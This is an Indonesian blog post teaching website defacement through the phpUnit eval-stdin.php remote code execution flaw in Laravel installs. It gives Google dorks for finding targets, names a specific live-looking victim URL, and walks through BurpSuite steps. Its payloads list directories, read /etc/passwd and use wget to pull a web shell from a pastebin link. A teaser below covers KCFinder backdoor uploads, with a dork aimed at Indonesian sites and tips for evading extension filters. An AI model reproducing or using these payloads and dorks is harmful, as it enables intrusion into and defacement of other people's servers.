Skip to main content

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

Tutorial deface POC Laravel phpUnit UPLOAD SHELV


Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang Laravel phpUnit UPLOAD SHELL.

       Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE)

Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite
Pertama siapkan :
- BurpSuite ( download di google banyak )
- Browser

Dorking di google :
- inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
* kembangin lagi biar dapet target lebih fresh

Exploit : /eval-stdin.php
site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
* kalau blank putih berarti vuln
Oke langsung aja, disini gua udh dapet targetnya :
http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Buka BurpSuite > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On )
Lalu kalian buka target yang tadi, dan buka BurpSuite lagi.

Jika sudah, klik kanan dan pilih Send to Repeater / Ctrl + R
Masuk ke Repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Nah sekarang saatnya mengeksekusi :v
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik " Go ".

Nanti kalo bisa di eksekusi bakal muncul responsnya disebelah kanan, lihat gambar.
Kalo gamuncul berarti gbs di eksekusi.

Langsung aja kita tusbool gan dgn perintah wget buat manggil shell kita

- <?php system('wget link shell lu -o px.php'); ?>
     atau lu bisa pake link shell gua
- <?php system('wget https://pastebin.com/raw/E5fXkdyC -o px.php'); ?>
Nb : px.php bisa ganti terserah kamu, buat namain file shell yg kita upload
Nah shell px.php gua udh ke upload, tinggal buka aja deh :*
Shell telah terupload :V


Comments

Post a Comment

Popular posts from this blog

Celah KCFinder

KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di   http://kcfinder.sunhater.com  untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini. Bagaimana cara dapatnya? Simpel saja, saya gunakan mata omm google yang tembus pandang untuk melihat target. Google dorknya inurl: index of/kcfinder/browse.php site:.co.id Di atas hanya contoh ya… setelah itu, kita tinggal upload file backdoornya. Sebagian server memproteksi dengan mereject file PHP. Jadi kita main kucing-kucingan saja. Itu file backdoor kita ganti ekstensinya dari .php ke .jpg atau .php3. Tapi yang ...
Post a Comment
Read more

Cara Melihat Penghasilan Adsense Di Blogger

Hai sobat Di artikel kali ini saya akan membagikan trik untuk melihat penghasilan Adsense kamu Di Blogger.Artikel ini sebetulnya untuk pemilik blog atau website yang sudah diterima dan mempunyai penghasilan dari Adsense. epjmku Jadi bagi kalian yang belum terdaftar di Adsense juga tidak apa-apa membaca artikel karena untuk menambah pengetahuan kalian untuk melihat penghasilan Adsense kalian kedepannya.Dan langsung aja ini dia caranya : Cara Melihat Penghasilan Adsense Di Blogger 1.Login blog kamu di  www.blogger.com  atau juga bisa menggunakan aplikasi Blogger 2.Klik setelan epjmku 3.Setelah itu pilih menu Bahasa dan pemformatan epjmku 4.Setelah itu ganti Bahasa Indonesia menjadi Bahasa Inggris epjmku Catatan :                                                                   ...
Post a Comment
Read more